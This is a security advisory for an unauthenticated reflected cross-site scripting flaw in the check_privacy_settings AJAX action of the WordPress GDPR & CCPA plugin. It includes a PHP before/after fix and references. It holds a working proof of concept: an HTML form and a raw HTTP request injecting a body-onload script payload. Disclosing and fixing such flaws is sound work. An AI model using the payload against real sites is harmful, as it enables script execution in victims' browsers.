WordPress GDPR & CCPA < 1.9.27 - Unauthenticated Reflected Cross-Site Scripting

Description

The check_privacy_settings AJAX action of the plugin, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since the HTML payload submitted in the settings parameter isn't properly escaped, it may be interpreted as HTML by a web browser directed to this endpoint, and JavaScript code may be executed in a victim's browser. Because v1.9.26 added a CSRF check, the XSS is only exploitable against unauthenticated users (as they all share the same nonce).
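To illustrate the fix, here is an added example (not the plugin's actual code; the handler bodies, the `gdpr_privacy_settings` nonce action name and the shape of the returned data are assumptions) contrasting the weak pattern described above with a hardened handler that sends a real JSON content-type and escapes HTML metacharacters. It assumes WordPress 5.6 or later for the `$flags` argument of `wp_send_json()`.

```php
<?php
// Weak pattern (reconstructed for illustration, not the plugin's code):
// the submitted settings are echoed back inside a JSON body, but no
// Content-Type header is sent and json_encode() leaves "<" and ">" intact,
// so a browser navigated to admin-ajax.php renders the body as HTML.
function weak_check_privacy_settings() {
    $settings = isset( $_POST['settings'] ) ? (array) $_POST['settings'] : array();
    $result   = array();
    foreach ( $settings as $id => $value ) {
        $result[] = array( 'id' => $id, 'value' => $value );
    }
    echo json_encode( array( 'success' => true, 'data' => $result ) );
    wp_die();
}

// Hardened handler.
function hardened_check_privacy_settings() {
    // The nonce check stops cross-site requests from logged-in users only:
    // logged-out visitors share one nonce, so the response itself must be safe.
    check_ajax_referer( 'gdpr_privacy_settings', 'nonce' );

    $settings = isset( $_POST['settings'] ) ? (array) wp_unslash( $_POST['settings'] ) : array();
    $result   = array();
    foreach ( $settings as $id => $value ) {
        // Only integer ids and plain-text values are expected (assumption).
        $result[] = array(
            'id'    => absint( $id ),
            'value' => sanitize_text_field( $value ),
        );
    }
    // wp_send_json() emits "Content-Type: application/json; charset=..." and
    // exits, so the browser never treats the body as HTML. The JSON_HEX_*
    // flags additionally escape <, >, &, ' and " inside strings as a second
    // layer in case the body is ever rendered elsewhere.
    wp_send_json(
        array( 'success' => true, 'data' => $result ),
        200,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
}

// Register for both authenticated and unauthenticated requests, as the
// original action is exposed to both.
add_action( 'wp_ajax_check_privacy_settings', 'hardened_check_privacy_settings' );
add_action( 'wp_ajax_nopriv_check_privacy_settings', 'hardened_check_privacy_settings' );
```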

Proof of Concept

```html
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="check_privacy_settings" />
      <input type="hidden" name="settings[40]" value="40" />
      <input type="hidden" name="settings[41]" value="<body onload=alert(`XSS`)>" />
      <input type="hidden" name="nonce" value="XXXX" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Connection: close
Upgrade-Insecure-Requests: 1

action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(`XSS`)%3e&nonce=XXXX
```

References

https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059
